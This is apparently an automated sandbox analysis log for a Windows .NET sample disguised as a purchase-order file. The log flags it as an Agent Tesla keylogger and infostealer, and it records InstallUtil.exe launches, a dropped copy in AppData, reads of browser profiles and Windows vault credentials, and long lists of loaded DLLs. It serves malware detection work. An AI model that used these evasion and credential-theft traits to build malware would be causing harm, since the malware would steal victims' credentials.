                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3a17e90.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.4013e10.3.raw.unpack, F8VZVLUPkb76WPMZ4nC.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.PO_9876563647-FLOWTRONIX (FT)UUE.exe.3909570.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeFile created: C:\Users\user\AppData\Roaming\Xpnzea.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeReversingLabs: Detection: 47%
                        Source: PO_9876563647-FLOWTRONIX (FT)UUE.exeVirustotal: Detection: 32%
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeFile read: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe "C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exe"
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Xpnzea.exe "C:\Users\user\AppData\Roaming\Xpnzea.exe"
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Xpnzea.exe "C:\Users\user\AppData\Roaming\Xpnzea.exe"
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO_9876563647-FLOWTRONIX (FT)UUE.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Xpnzea.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
